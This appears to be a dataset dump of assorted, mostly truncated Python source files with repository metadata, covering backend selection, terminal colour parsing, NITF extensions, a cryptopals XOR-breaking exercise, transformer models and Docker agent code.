_DEFAULT = [] # [0] = global default, [1:] from 'with' blocks
_PRECISION = [32] # [0] = global precision in bits, [1:] from 'with' blocks
def choose_backend(*values, prefer_default=False) -> Backend:
"""
Selects a suitable backend to handle the given values.
This function is used by most math functions operating on `Tensor` objects to delegate the actual computations.
Args:
*values:
prefer_default: if True, selects the default backend assuming it can handle handle the values, see `default_backend()`.
raise_error: Determines the behavior of this function if no backend can handle the given values.
If True, raises a `NoBackendFound` error, else returns `None`.
Returns:
the selected `Backend`
"""
# --- Default Backend has priority ---
if _is_applicable(_DEFAULT[-1], values) and (prefer_default or _is_specific(_DEFAULT[-1], values)):
return _DEFAULT[-1]
# --- Filter out non-applicable ---
backends = [backend for backend in BACKENDS if _is_applicable(backend, values)]
if len(backends) == 0:
raise NoBackendFound(f"No backend found for types {[type(v).__name__ for v in values]}; registered backends are {BACKENDS}")
# --- Native tensors? ---
for backend in backends:
if _is_specific(backend, values):
return backend
return backends[0]
def default_backend() -> Backend:
"""
The default backend is preferred by `choose_backend()`.
The default backend can be set globally using `set_global_default_backend()` and locally using `with backend:`.
Returns:
current default `Backend`
"""
return _DEFAULT[-1]
def context_backend() -> Backend or None:
"""
Returns the backend set by the inner-most surrounding `with backend:` block.
If called outside a backend context, returns `None`.
Returns:
`Backend` or `None`
"""
return _DEFAULT[-1] if len(_DEFAULT) > 1 else None
def set_global_default_backend(backend: Backend):
"""
Sets the given backend as default.
This setting can be overridden using `with backend:`.
See `default_backend()`, `choose_backend()`.
Args:
backend: `Backend` to set as default
"""
assert isinstance(backend, Backend)
_DEFAULT[0] = backend
def set_global_precision(floating_point_bits: int):
"""
Sets the floating point precision of DYNAMIC_BACKEND which affects all registered backends.
If `floating_point_bits` is an integer, all floating point tensors created henceforth will be of the corresponding data type, float16, float32 or float64.
Operations may also convert floating point values to this precision, even if the input had a different precision.
If `floating_point_bits` is None, new tensors will default to float32 unless specified otherwise.
The output of math operations has the same precision as its inputs.
Args:
floating_point_bits: one of (16, 32, 64, None)
"""
_PRECISION[0] = floating_point_bits
def get_precision() -> int:
"""
Gets the current target floating point precision in bits.
The precision can be set globally using `set_global_precision()` or locally using `with precision(p):`.
Any Backend method may convert floating point values to this precision, even if the input had a different precision.
Returns:
16 for half, 32 for single, 64 for double
"""
return _PRECISION[-1]
def convert(tensor, backend: Backend = None, use_dlpack=True):
"""
Convert a Tensor to the native format of `backend`.
If the target backend can operate natively on `tensor`, returns `tensor`.
If both backends support *DLPack* and `use_dlpack=True`, uses zero-copy conversion using the DLPack library.
Else, intermediately converts `tensor` to a NumPy array.
*Warning*: This operation breaks the automatic differentiation chain.
Args:
tensor: Native tensor belonging to any registered backend.
backend: Target backend. If `None`, uses the current default backend, see `default_backend()`.
Returns:
Tensor belonging to `backend`.
"""
backend = backend or default_backend()
current_backend = choose_backend(tensor, prefer_default=False)
if backend.is_tensor(tensor, True) or backend is current_backend:
return tensor
if use_dlpack and current_backend.supports(Backend.to_dlpack) and backend.supports(Backend.from_dlpack):
capsule = current_backend.to_dlpack(tensor)
return backend.from_dlpack(capsule)
else:
nparray = current_backend.numpy(tensor)
return backend.as_tensor(nparray)
# Backend choice utility functions
# Other low-level helper functions
| 37.677311 | 216 | 0.629293 |
6a42b37643b67ad750eaa6bdb4b138eb04976787
| 2,736 |
py
|
Python
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 2,168 |
2015-01-01T11:41:40.000Z
|
2022-03-29T07:44:48.000Z
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 521 |
2015-01-02T16:43:44.000Z
|
2022-03-31T12:37:55.000Z
|
bpython/curtsiesfrontend/parse.py
|
dtrodrigues/bpython
|
143e4e55d8f5227149528a5880a32a516a40f14d
|
[
"PSF-2.0"
] | 250 |
2015-01-08T21:28:18.000Z
|
2022-02-28T16:07:43.000Z
|
import re
from curtsies.formatstring import fmtstr, FmtStr
from curtsies.termformatconstants import (
FG_COLORS,
BG_COLORS,
colors as CURTSIES_COLORS,
)
from functools import partial
from ..lazyre import LazyReCompile
COLORS = CURTSIES_COLORS + ("default",)
CNAMES = dict(zip("krgybmcwd", COLORS))
# hack for finding the "inverse"
INVERSE_COLORS = {
CURTSIES_COLORS[idx]: CURTSIES_COLORS[
(idx + (len(CURTSIES_COLORS) // 2)) % len(CURTSIES_COLORS)
]
for idx in range(len(CURTSIES_COLORS))
}
INVERSE_COLORS["default"] = INVERSE_COLORS[CURTSIES_COLORS[0]]
def func_for_letter(letter_color_code: str, default: str = "k"):
"""Returns FmtStr constructor for a bpython-style color code"""
if letter_color_code == "d":
letter_color_code = default
elif letter_color_code == "D":
letter_color_code = default.upper()
return partial(
fmtstr,
fg=CNAMES[letter_color_code.lower()],
bold=letter_color_code.isupper(),
)
def parse(s):
"""Returns a FmtStr object from a bpython-formatted colored string"""
rest = s
stuff = []
while True:
if not rest:
break
start, rest = peel_off_string(rest)
stuff.append(start)
return (
sum((fs_from_match(d) for d in stuff[1:]), fs_from_match(stuff[0]))
if len(stuff) > 0
else FmtStr()
)
peel_off_string_re = LazyReCompile(
r"""(?P<colormarker>\x01
(?P<fg>[krgybmcwdKRGYBMCWD]?)
(?P<bg>[krgybmcwdKRGYBMCWDI]?)?)
(?P<bold>\x02?)
\x03
(?P<string>[^\x04]*)
\x04
(?P<rest>.*)
""",
re.VERBOSE | re.DOTALL,
)
| 25.811321 | 75 | 0.592105 |
6a42bb37de5c18887c2934162db7f55a1fffd8c4
| 1,277 |
py
|
Python
|
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | 1 |
2021-02-04T08:44:18.000Z
|
2021-02-04T08:44:18.000Z
|
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | null | null | null |
sarpy/io/general/nitf_elements/tres/unclass/BANDSA.py
|
pressler-vsc/sarpy
|
fa6c951c42b9a7d9df2edfa53c771494cb0246fb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
| 33.605263 | 59 | 0.623336 |
6a4363b0709ea506c58a60f1aaca731beda241f8
| 5,631 |
py
|
Python
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 1,013 |
2019-06-04T14:25:24.000Z
|
2022-03-26T05:52:00.000Z
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 427 |
2019-06-17T13:45:50.000Z
|
2022-03-25T16:23:49.000Z
|
ktrain/graph/learner.py
|
husmen/ktrain
|
4147b0bd146deb513c6f94505908294a5163efac
|
[
"Apache-2.0"
] | 272 |
2019-06-05T03:19:07.000Z
|
2022-03-28T02:23:37.000Z
|
from ..imports import *
from .. import utils as U
from ..core import GenLearner
| 35.19375 | 96 | 0.582845 |
6a448dff56ffb800e61093b735c0b738b7008227
| 12,168 |
py
|
Python
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 5 |
2021-09-16T11:55:12.000Z
|
2022-03-03T12:20:22.000Z
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 1 |
2021-11-22T09:41:52.000Z
|
2021-11-24T02:25:49.000Z
|
VegaZero2VegaLite.py
|
Thanksyy/Vega-Zero
|
dd25cb145faec047b01ca54c69ba96c56adb99f4
|
[
"MIT"
] | 2 |
2021-09-17T09:44:18.000Z
|
2022-03-05T19:14:45.000Z
|
__author__ = "Yuyu Luo"
import json
import pandas
| 48.094862 | 123 | 0.469921 |
6a452a7c2c457bc63abb482a8725d53337bd5e88
| 6,254 |
py
|
Python
|
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | null | null | null |
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | 2 |
2020-04-12T11:31:24.000Z
|
2020-04-14T17:17:00.000Z
|
utils/dancer.py
|
kmzbrnoI/ac-python
|
383802734e17d2a00c0b86083cf923517db02acd
|
[
"Apache-2.0"
] | null | null | null |
"""Library for executing user-defined dance."""
import logging
from typing import Any, Dict, Optional, Callable
import datetime
import ac
import ac.blocks
from ac import ACs, AC
JC = Dict[str, Any]
def track_is_occupied(block: ac.Block) -> bool:
return bool(block['blockState']['state'] == 'occupied')
| 28.820276 | 79 | 0.570675 |
6a46dce57aefdfdd686c732c07a762fc3d1085f3
| 780 |
py
|
Python
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 38 |
2020-03-14T22:22:40.000Z
|
2022-02-24T18:05:45.000Z
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 3 |
2021-03-30T13:15:12.000Z
|
2021-09-22T18:55:59.000Z
|
praw/models/reddit/mixins/reportable.py
|
zachwylde00/praw
|
ad1d73e6a4a33397bbd983bdfde1a4f99ce5607d
|
[
"BSD-2-Clause"
] | 9 |
2020-02-21T23:55:13.000Z
|
2021-03-22T07:48:23.000Z
|
"""Provide the ReportableMixin class."""
from ....const import API_PATH
| 26 | 76 | 0.60641 |
6a49b924a41db77163a887ba4fb25f3e874556fc
| 3,158 |
py
|
Python
|
mellon/factories/filesystem/file.py
|
LaudateCorpus1/mellon
|
a7a9f6d8abf1dd03b63a94ddb4439c6cc6c2e272
|
[
"MIT"
] | 5 |
2016-12-20T19:39:01.000Z
|
2021-01-08T16:19:17.000Z
|
mellon/factories/filesystem/file.py
|
CrowdStrike/mellon
|
7216f255d397a41b1c2777a1b02f1c085d07ddfe
|
[
"MIT"
] | 1 |
2018-03-21T17:05:13.000Z
|
2018-03-21T17:05:13.000Z
|
mellon/factories/filesystem/file.py
|
LaudateCorpus1/mellon
|
a7a9f6d8abf1dd03b63a94ddb4439c6cc6c2e272
|
[
"MIT"
] | 2 |
2017-11-01T15:03:27.000Z
|
2018-11-13T03:04:44.000Z
|
import collections
import os.path
from zope import component
from zope import interface
from zope.component.factory import Factory
from sparc.configuration import container
import mellon
mellonByteFileFromFilePathAndConfigFactory = Factory(MellonByteFileFromFilePathAndConfig)
mellonUnicodeFileFromFilePathAndConfigFactory = Factory(MellonUnicodeFileFromFilePathAndConfig)
mellonFileProviderForRecursiveDirectoryConfigFactory = Factory(MellonFileProviderForRecursiveDirectoryConfig)
interface.alsoProvides(mellonFileProviderForRecursiveDirectoryConfigFactory, mellon.IMellonFileProviderFactory)
| 39.974684 | 111 | 0.662445 |
6a49d502d09956cefd00c54538889163bfebf8f9
| 1,157 |
py
|
Python
|
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 2 |
2019-09-01T01:38:59.000Z
|
2020-02-13T19:25:51.000Z
|
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | null | null | null |
dltb/thirdparty/datasource/__init__.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | null | null | null |
"""Predefined Datasources.
"""
# toolbox imports
from ...datasource import Datasource
Datasource.register_instance('imagenet-val', __name__ + '.imagenet',
'ImageNet', section='val') # section='train'
Datasource.register_instance('dogsandcats', __name__ + '.dogsandcats',
'DogsAndCats')
Datasource.register_instance('widerface', __name__ + '.widerface', 'WiderFace')
Datasource.register_instance('fgnet', __name__ + '.fgnet', 'FGNet')
Datasource.register_instance('Helen', __name__ + '.helen', 'Helen')
Datasource.register_instance('lfw', __name__ + '.lfw', 'LabeledFacesInTheWild')
Datasource.register_instance('ms-celeb-1m', __name__ + '.face', 'MSCeleb1M')
Datasource.register_instance('5celeb', __name__ + '.fivecelebface',
'FiveCelebFace')
Datasource.register_instance('ffhq', __name__ + '.ffhq', 'FFHQ')
Datasource.register_instance('celeba', __name__ + '.celeba', 'CelebA')
Datasource.register_instance('celeba-aligned', __name__ + '.celeba',
'CelebA', aligned=True)
Datasource.register_class('WiderFace', __name__ + '.widerface')
| 48.208333 | 79 | 0.679343 |
6a4a66b1a2f63505cf706ff9fb8521db9d0bf0ee
| 2,127 |
py
|
Python
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 7 |
2019-09-23T12:46:03.000Z
|
2022-02-16T11:32:58.000Z
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 14 |
2020-01-28T16:20:15.000Z
|
2021-04-13T17:24:00.000Z
|
tests/test_results.py
|
babinyurii/RECAN
|
b49326b47bae22316c3776fee2f398e09a98ba96
|
[
"MIT"
] | 8 |
2020-01-03T11:47:51.000Z
|
2021-09-17T03:43:43.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 22 15:58:44 2019
@author: babin
"""
posits_def = [251, 501, 751, 1001, 1251, 1501, 1751, 2001, 2251, 2501, 2751, 3001, 3215]
dist_whole_align_ref = {'AB048704.1_genotype_C_':
[0.88,
0.938,
0.914,
0.886,
0.89,
0.908,
0.938,
0.948,
0.948,
0.886,
0.852,
0.8580645161290322,
0.827906976744186],
'AB010291.1_Bj':
[0.968,
0.986,
0.946,
0.92,
0.94,
0.964,
0.95,
0.892,
0.914,
0.9359999999999999,
0.924,
0.935483870967742,
0.9255813953488372]}
dist_win_250_shift_100_ref = {'AB048704.1_genotype_C_':
[0.87,
0.9,
0.9359999999999999,
0.924,
0.944,
0.944,
0.948,
0.888,
0.868,
0.86,
0.888,
0.9,
0.908,
0.88,
0.916,
0.924,
0.94,
0.96,
0.948,
0.9319999999999999,
0.944,
0.9359999999999999,
0.96,
0.9319999999999999,
0.864,
0.8200000000000001,
0.88,
0.892,
0.88,
0.844,
0.827906976744186,
0.8608695652173913,
0.9333333333333333],
'AB010291.1_Bj': [0.95,
0.984,
0.988,
0.984,
0.98,
0.98,
0.98,
0.92,
0.896,
0.888,
0.928,
0.94,
0.96,
0.948,
0.976,
0.976,
0.968,
0.952,
0.896,
0.844,
0.86,
0.908,
0.976,
0.948,
0.916,
0.904,
0.9359999999999999,
0.948,
0.94,
0.9359999999999999,
0.9255813953488372,
0.9217391304347826,
0.8666666666666667]}
dist_whole_align_def_params_k2p = {'AB048704.1_genotype_C_':
[0.8681719101219889,
0.9351731626008992,
0.9083728156043438,
0.8750271283550077,
0.879929128403318,
0.9015597329057567,
0.9351297624958606,
0.9459250442159328,
0.9459717143364927,
0.8760802380420646,
0.8343273948904422,
0.841497348083017,
0.8033200314745574],
'AB010291.1_Bj':
[0.9671530980992109,
0.9858456107911616,
0.9438329817983037,
0.9150569322625627,
0.9372918193486423,
0.9630251291666885,
0.9481456308045444,
0.8823622232289046,
0.9077377632214376,
0.9325670957791264,
0.919398127767968,
0.9323907045444492,
0.9211964811945209]}
| 15.302158 | 88 | 0.608839 |
6a4a72c7391f2894d44f2f4cea661cdcb3c4d282
| 4,999 |
py
|
Python
|
lxmls/readers/simple_data_set.py
|
SimonSuster/lxmls-toolkit
|
6a57884f8b7c98da816a60eb88593e0a1585d434
|
[
"MIT"
] | 1 |
2015-09-20T05:16:38.000Z
|
2015-09-20T05:16:38.000Z
|
lxmls/readers/simple_data_set.py
|
daviddao/LxMLS-labs-solution
|
78413c1ee61752ca33988c454e3b2c27326e7063
|
[
"MIT"
] | null | null | null |
lxmls/readers/simple_data_set.py
|
daviddao/LxMLS-labs-solution
|
78413c1ee61752ca33988c454e3b2c27326e7063
|
[
"MIT"
] | null | null | null |
import numpy as np
# This class generates a 2D dataset with two classes, "positive" and "negative".
# Each class follows a Gaussian distribution.
| 43.469565 | 327 | 0.595319 |
6a4a8d86cea615c452f20cba99db27d3430077bf
| 4,840 |
py
|
Python
|
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | 1 |
2021-07-05T09:13:48.000Z
|
2021-07-05T09:13:48.000Z
|
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | null | null | null |
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | 1 |
2020-04-18T19:53:02.000Z
|
2020-04-18T19:53:02.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Break repeating-key XOR
#
# It is officially on, now.
#
# This challenge isn't conceptually hard, but it involves actual
# error-prone coding. The other challenges in this set are there to bring
# you up to speed. This one is there to qualify you. If you can do this
# one, you're probably just fine up to Set 6.
#
# There's a file here:
#
# http://cryptopals.com/static/challenge-data/6.txt
#
# It's been base64'd after being encrypted with repeating-key XOR.
#
# Decrypt it.
#
# Here's how:
#
# 1. Let KEYSIZE be the guessed length of the key; try values from 2 to
# (say) 40.
# 2. Write a function to compute the edit distance/Hamming distance between
# two strings. The Hamming distance is just the number of differing
# bits. The distance between:
#
# this is a test
#
# and
#
# wokka wokka!!!
#
# is 37. *Make sure your code agrees before you proceed.*
# 3. For each KEYSIZE, take the first KEYSIZE worth of bytes, and the
# second KEYSIZE worth of bytes, and find the edit distance between them.
# Normalize this result by dividing by KEYSIZE.
# 4. The KEYSIZE with the smallest normalized edit distance is probably the
# key. You could proceed perhaps with the smallest 2-3 KEYSIZE values.
# Or take 4 KEYSIZE blocks instead of 2 and average the distances.
# 5. Now that you probably know the KEYSIZE: break the ciphertext into
# blocks of KEYSIZE length.
# 6. Now transpose the blocks: make a block that is the first byte of every
# block, and a block that is the second byte of every block, and so on.
# 7. Solve each block as if it was single-character XOR. You already have
# code to do this.
# 8. For each block, the single-byte XOR key that produces the best looking
# histogram is the repeating-key XOR key byte for that block. Put them
# together and you have the key.
#
# This code is going to turn out to be surprisingly useful later on. Breaking
# repeating-key XOR ("Vigenre") statistically is obviously an academic
# exercise, a "Crypto 101" thing. But more people "know how" to break it than
# can actually break it, and a similar technique breaks something much more
# important.
#
# No, that's not a mistake.
#
# We get more tech support questions for this challenge than any of the
# other ones. We promise, there aren't any blatant errors in this text.
# In particular: the "wokka wokka!!!" edit distance really is 37.
#
import inspect
import os
import sys
from itertools import zip_longest
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getfile(lambda: 0)))))
from util.loader import loader
from util.text import englishness, repeating_key_xor, single_byte_xor
# Lookup table for the number of 1 bits in a nibble. (Nybble, quartet, etc.)
NIBBLE_BITS = [0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4]
def likely_key_sizes(bs, lower=2, upper=40, n=3):
"""Finds a repeating-key-XOR'd ciphertext's most likely key sizes."""
sizes = {}
for size in range(lower, upper + 1):
normalized_distance = 0
for i in range(0, len(bs) - size * 2, size * 2):
bs1, bs2 = bs[i : i + size], bs[i + size : i + size * 2]
normalized_distance += hamming_distance(bs1, bs2) / 2
sizes.update({size: normalized_distance})
return sorted(sizes, key=lambda k: sizes[k])[:n]
def hamming_distance(bs1, bs2):
"""Finds the Hamming distance between two bytestrings."""
distance = 0
for b1, b2 in zip_longest(bs1, bs2, fillvalue=0):
b = b1 ^ b2
distance += NIBBLE_BITS[b >> 4] + NIBBLE_BITS[b & 0xF]
return distance
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
# Output:
#
# Key: 'Terminator X: Bring the noise' (29 bytes)
#
# I'm back and I'm ringin' the bell
# A rockin' on the mike while the fly girls yell
# In ecstasy in the back of me
# Well that's my DJ Deshay cuttin' all them Z's
# Hittin' hard and the girlies goin' crazy
# Vanilla's on the mike, man I'm not lazy.
#
# <remainder of output omitted>
#
| 32.266667 | 94 | 0.667355 |
6a4a939ebfe3446641070ee1531f5dae14b39a3f
| 26,798 |
py
|
Python
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 22 |
2021-05-22T19:58:39.000Z
|
2022-03-20T03:43:51.000Z
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 1 |
2021-07-17T13:15:33.000Z
|
2022-02-24T13:59:14.000Z
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 2 |
2021-05-10T05:18:00.000Z
|
2022-02-24T19:01:50.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as f
from prettytable import PrettyTable
from c2nl.modules.char_embedding import CharEmbedding
from c2nl.modules.embeddings import Embeddings
from c2nl.modules.highway import Highway
from c2nl.encoders.transformer import TransformerEncoder
from c2nl.decoders.transformer import TransformerDecoder
from c2nl.inputters import constants
from c2nl.modules.global_attention import GlobalAttention
from c2nl.modules.copy_generator import CopyGenerator, CopyGeneratorCriterion
from c2nl.utils.misc import sequence_mask
| 42.334913 | 98 | 0.504926 |
6a4c4690f289d0da27d1fd0d344a2302e88669f6
| 3,344 |
py
|
Python
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 8 |
2015-07-20T15:29:25.000Z
|
2018-06-27T13:30:13.000Z
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 47 |
2015-07-13T23:47:35.000Z
|
2020-07-31T16:06:34.000Z
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 21 |
2015-08-21T01:58:47.000Z
|
2021-01-24T11:59:25.000Z
|
import logging
from cattle import Config
from cattle.utils import reply, popen
from .compute import DockerCompute
from cattle.agent.handler import BaseHandler
from cattle.progress import Progress
from cattle.type_manager import get_type, MARSHALLER
from . import docker_client
import subprocess
import os
import time
log = logging.getLogger('docker')
| 27.636364 | 78 | 0.535287 |
6a4da8a95b67b63d32309af5c23df6977103484a
| 6,391 |
py
|
Python
|
bitraider/strategy.py
|
ehickox2012/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 2 |
2015-03-05T22:28:43.000Z
|
2015-03-12T23:07:54.000Z
|
bitraider/strategy.py
|
ehickox/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 2 |
2015-04-05T21:13:59.000Z
|
2015-04-05T21:16:05.000Z
|
bitraider/strategy.py
|
ehickox/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 1 |
2015-08-16T18:53:00.000Z
|
2015-08-16T18:53:00.000Z
|
import sys
import pytz
#import xml.utils.iso8601
import time
import numpy
from datetime import date, datetime, timedelta
from matplotlib import pyplot as plt
from exchange import cb_exchange as cb_exchange
from exchange import CoinbaseExchangeAuth
from abc import ABCMeta, abstractmethod
| 42.324503 | 267 | 0.636833 |
dbde179232e6a3f834cec05a67d959715c486849
| 715 |
py
|
Python
|
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | 7 |
2019-02-16T02:52:12.000Z
|
2021-11-08T13:10:46.000Z
|
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | null | null | null |
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | 14 |
2018-11-18T04:33:38.000Z
|
2021-08-14T03:29:18.000Z
|
import numpy as np
# Perceptron
neural_network = neuron(neuron(inputs, weights1), weights2)
| 23.064516 | 59 | 0.682517 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.